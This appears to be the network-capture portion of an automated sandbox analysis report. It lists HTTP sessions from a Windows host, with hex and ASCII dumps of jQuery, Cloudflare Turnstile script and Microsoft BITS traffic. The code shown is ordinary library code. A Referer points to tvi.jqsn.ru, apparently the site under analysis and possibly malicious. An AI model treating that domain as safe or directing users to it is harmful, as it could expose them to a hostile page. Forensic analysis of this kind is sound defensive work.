                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:26 UTC571INHTTP/1.1 200 OK
                                                                                                                          Connection: close
                                                                                                                          Content-Length: 89501
                                                                                                                          Server: nginx
                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                          ETag: "28feccc0-15d9d"
                                                                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:26 GMT
                                                                                                                          Age: 3079553
                                                                                                                          X-Served-By: cache-lga21931-LGA, cache-pdk-kfty2130020-PDK
                                                                                                                          X-Cache: HIT, HIT
                                                                                                                          X-Cache-Hits: 2318, 275
                                                                                                                          X-Timer: S1713314066.025790,VS0,VE0
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          2024-04-17 00:34:26 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                          2024-04-17 00:34:26 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                          Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                          2024-04-17 00:34:26 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                          Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                          2024-04-17 00:34:26 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                          Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                          2024-04-17 00:34:26 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                          Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                          2024-04-17 00:34:26 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                          Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.44974423.63.206.91443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:25 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: identity
                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                          Host: fs.microsoft.com
                                                                                                                          2024-04-17 00:34:26 UTC468INHTTP/1.1 200 OK
                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                          Server: ECAcc (chd/079C)
                                                                                                                          X-CID: 11
                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                          X-Ms-Region: prod-eus2-z1
                                                                                                                          Cache-Control: public, max-age=109752
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:26 GMT
                                                                                                                          Connection: close
                                                                                                                          X-CID: 2


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.449745104.17.2.1844433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:26 UTC658OUTGET /turnstile/v0/b/bcc5fb0a8815/api.js?render=explicit HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://tvi.jqsn.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:26 UTC340INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:26 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 40614
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 87585453f86c12d1-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-04-17 00:34:26 UTC1029INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 2c 72 2c 74 2c 69 2c 75 2c 73 2c 6d 29 7b 74 72 79 7b 76 61 72 20 79 3d 65 5b 73 5d 28 6d 29 2c 62 3d 79 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 64 29 7b 74 28 64 29 3b 72 65 74 75 72 6e 7d 79 2e 64 6f 6e 65 3f 72 28 62 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 62 29 2e 74 68 65 6e 28 69 2c 75 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 69 2c 75 29 7b 76 61 72 20 73 3d 65 2e 61 70 70 6c 79 28 72 2c 74 29 3b 66 75 6e 63 74
                                                                                                                          Data Ascii: "use strict";(function(){function gt(e,r,t,i,u,s,m){try{var y=e[s](m),b=y.value}catch(d){t(d);return}y.done?r(b):Promise.resolve(b).then(i,u)}function yt(e){return function(){var r=this,t=arguments;return new Promise(function(i,u){var s=e.apply(r,t);funct
                                                                                                                          2024-04-17 00:34:26 UTC1369INData Raw: 74 69 6f 6e 28 75 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 75 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 69 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 5f 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 69 72 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74
                                                                                                                          Data Ascii: tion(u){return Object.getOwnPropertyDescriptor(e,u).enumerable})),t.push.apply(t,i)}return t}function _t(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):ir(Object(r)).forEach(funct
                                                                                                                          2024-04-17 00:34:26 UTC1369INData Raw: 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 54 65 28 65 2c 72 29 7b 76 61 72 20 74 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 73 5b 30 5d 26 31 29 74 68 72 6f 77 20 73 5b 31 5d 3b 72 65 74 75 72 6e 20 73 5b 31 5d 7d 2c 74 72 79 73 3a 5b 5d 2c 6f 70 73 3a 5b 5d 7d 2c 69 2c 75 2c 73 2c 6d 3b 72 65 74 75 72 6e 20 6d 3d 7b 6e 65 78 74 3a 79 28 30 29 2c 74 68 72 6f 77 3a 79 28 31 29 2c 72 65 74 75 72 6e 3a 79 28 32 29 7d 2c 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 28 6d 5b 53 79 6d 62 6f
                                                                                                                          Data Ascii: &typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Te(e,r){var t={label:0,sent:function(){if(s[0]&1)throw s[1];return s[1]},trys:[],ops:[]},i,u,s,m;return m={next:y(0),throw:y(1),return:y(2)},typeof Symbol=="function"&&(m[Symbo
                                                                                                                          2024-04-17 00:34:26 UTC1369INData Raw: 72 6d 61 6c 22 2c 65 2e 43 4f 4d 50 41 43 54 3d 22 63 6f 6d 70 61 63 74 22 2c 65 2e 49 4e 56 49 53 49 42 4c 45 3d 22 69 6e 76 69 73 69 62 6c 65 22 7d 29 28 6a 7c 7c 28 6a 3d 7b 7d 29 29 3b 76 61 72 20 49 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 49 65 7c 7c 28 49 65 3d 7b 7d 29 29 3b 76 61 72 20 66 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 66 65 7c 7c 28 66 65 3d 7b 7d 29 29 3b 76 61 72 20 47 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e
                                                                                                                          Data Ascii: rmal",e.COMPACT="compact",e.INVISIBLE="invisible"})(j||(j={}));var Ie;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Ie||(Ie={}));var fe;(function(e){e.NEVER="never",e.AUTO="auto"})(fe||(fe={}));var G;(function(e){e.NEVER="never",e.MANUAL="man
                                                                                                                          2024-04-17 00:34:26 UTC1369INData Raw: 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 65 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 55 3d 22 30 2f 30 22 3b 76 61 72 20 53 74 3d 33 30 30 2c 49 74 3d 31 30 3b 76 61 72 20 69 65 3d 22 63 66 2d 63 68 6c 2d 77 69 64 67 65 74 2d 22 2c 4d 3d 22 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 41 74 3d 22 2e 63 66 2d 74 75 72 6e 73 74 69 6c 65 22 2c 4f 74 3d 22 2e 63 66 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 52 74 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 43 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 6b 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 4e 74 3d 22 67 2d 72 65 63 61 70 74
                                                                                                                          Data Ascii: y"],e)}function et(e){return N(["render","execute"],e)}var U="0/0";var St=300,It=10;var ie="cf-chl-widget-",M="cloudflare-challenge",At=".cf-turnstile",Ot=".cf-challenge",Rt=".g-recaptcha",Ct="cf_challenge_response",kt="cf-turnstile-response",Nt="g-recapt
                                                                                                                          2024-04-17 00:34:26 UTC1369INData Raw: 72 6e 20 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 7d 2c 65 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 52 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 52 65 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 69 66 28 69 3d 3d 3d 6e 75 6c 6c 7c 7c 21 57 74 28 69 29 29 72 65 74 75 72 6e 20 69 3b 69 66 28 74 79 70 65 6f 66 20 69 21 3d 22 66 75 6e 63 74
                                                                                                                          Data Ascii: rn t.__proto__||Object.getPrototypeOf(t)},ee(e)}function Wt(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function Re(e){var r=typeof Map=="function"?new Map:void 0;return Re=function(i){if(i===null||!Wt(i))return i;if(typeof i!="funct
                                                                                                                          2024-04-17 00:34:26 UTC1369INData Raw: 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 69 3d 30 2c 75 3b 75 3d 74 5b 69 5d 3b 69 2b 2b 29 69 66 28 43 28 75 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 75 2e 73 72 63 29 29 72 65 74 75 72 6e 20 75 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 29 7b 76 61 72 20 65 3d 72 74 28 29 3b 65 7c 7c 76 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c
                                                                                                                          Data Ascii: MLScriptElement)&&e.test(r.src))return r;for(var t=document.querySelectorAll("script"),i=0,u;u=t[i];i++)if(C(u,HTMLScriptElement)&&e.test(u.src))return u}function Bt(){var e=rt();e||v("Could not find Turnstile script tag, some features may not be availabl
                                                                                                                          2024-04-17 00:34:26 UTC1369INData Raw: 6f 67 28 22 54 75 72 6e 73 74 69 6c 65 20 57 69 64 67 65 74 20 73 65 65 6d 20 74 6f 20 68 61 76 65 20 63 72 61 73 68 65 64 3a 20 22 2c 62 29 3b 76 61 72 20 6c 3b 69 66 28 28 41 3d 65 2e 6d 73 67 48 61 6e 64 6c 65 72 29 3d 3d 3d 6e 75 6c 6c 7c 7c 41 3d 3d 3d 76 6f 69 64 20 30 7c 7c 41 2e 63 61 6c 6c 28 65 2c 7b 64 61 74 61 3a 7b 73 6f 75 72 63 65 3a 4d 2c 77 69 64 67 65 74 49 64 3a 62 2c 63 6f 64 65 3a 53 65 2c 65 76 65 6e 74 3a 22 66 61 69 6c 22 2c 72 63 56 3a 28 6c 3d 64 2e 72 63 56 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 55 7d 7d 29 2c 72 29 7b 76 61 72 20 6f 3b 77 69 6e 64 6f 77 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 7b 73 6f 75 72 63 65 3a 4d 2c 77 69 64 67 65 74 49 64 3a 62 2c 65 76 65 6e 74 3a 22 72 63 76 2d 75 70 64 61
                                                                                                                          Data Ascii: og("Turnstile Widget seem to have crashed: ",b);var l;if((A=e.msgHandler)===null||A===void 0||A.call(e,{data:{source:M,widgetId:b,code:Se,event:"fail",rcV:(l=d.rcV)!==null&&l!==void 0?l:U}}),r){var o;window.postMessage({source:M,widgetId:b,event:"rcv-upda
                                                                                                                          2024-04-17 00:34:26 UTC1369INData Raw: 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 62 2c 22 74 75 72 6e 73 74 69 6c 65 2f 69 66 2f 6f 76 32 2f 61 76 30 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 69 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 73 69 7a 65 29 2e 63 6f 6e 63 61 74 28 64 29 7d 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 29 7b 76 61 72 20 74 3b 72 2e 75 70 67 72 61 64 65 41 74 74 65 6d 70 74 73 2b 2b 3b 76 61 72 20 69 3d 72 74 28 29 3b 69 66 28 21 28 21 69 7c 7c 21 69 2e 70 61 72 65 6e 74 4e 6f 64 65 29 29 7b 76 61 72 20 75 3d 69 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 69 2e 6e 6f 6e 63
                                                                                                                          Data Ascii: gi/challenge-platform/").concat(b,"turnstile/if/ov2/av0/rcv").concat(i,"/").concat(e,"/").concat(r,"/").concat(t.theme,"/").concat(t.size).concat(d)}function Vt(e,r){var t;r.upgradeAttempts++;var i=rt();if(!(!i||!i.parentNode)){var u=i==null?void 0:i.nonc
                                                                                                                          2024-04-17 00:34:26 UTC1369INData Raw: 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 4e 6f 64 65 49 74 65 72 61 74 6f 72 28 65 2c 4e 6f 64 65 46 69 6c 74 65 72 2e 53 48 4f 57 5f 45 4c 45 4d 45 4e 54 7c 4e 6f 64 65 46 69 6c 74 65 72 2e 53 48 4f 57 5f 54 45 58 54 2c 7b 61 63 63 65 70 74 4e 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 52 29 7b 72 65 74 75 72 6e 20 75 3e 72 7c 7c 69 2e 6c 65 6e 67 74 68 3e 74 3f 4e 6f 64 65 46 69 6c 74 65 72 2e 46 49 4c 54 45 52 5f 52 45 4a 45 43 54 3a 4e 6f 64 65 46 69 6c 74 65 72 2e 46 49 4c 54 45 52 5f 41 43 43 45 50 54 7d 7d 29 2c 6d 3b 28 6d 3d 73 2e 6e 65 78 74 4e 6f 64 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 69 2e 6c 65 6e 67 74 68 3c 74 3b 29 7b 69 66 28 6d 2e 6e 6f 64 65 54 79 70 65 3d 3d 3d 4e 6f 64 65 2e 45 4c 45 4d 45 4e 54 5f 4e 4f 44 45 29 7b 76 61 72 20
                                                                                                                          Data Ascii: =document.createNodeIterator(e,NodeFilter.SHOW_ELEMENT|NodeFilter.SHOW_TEXT,{acceptNode:function(R){return u>r||i.length>t?NodeFilter.FILTER_REJECT:NodeFilter.FILTER_ACCEPT}}),m;(m=s.nextNode())!==null&&i.length<t;){if(m.nodeType===Node.ELEMENT_NODE){var


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.44974623.63.206.91443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:26 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: identity
                                                                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                          Range: bytes=0-2147483646
                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                          Host: fs.microsoft.com
                                                                                                                          2024-04-17 00:34:26 UTC531INHTTP/1.1 200 OK
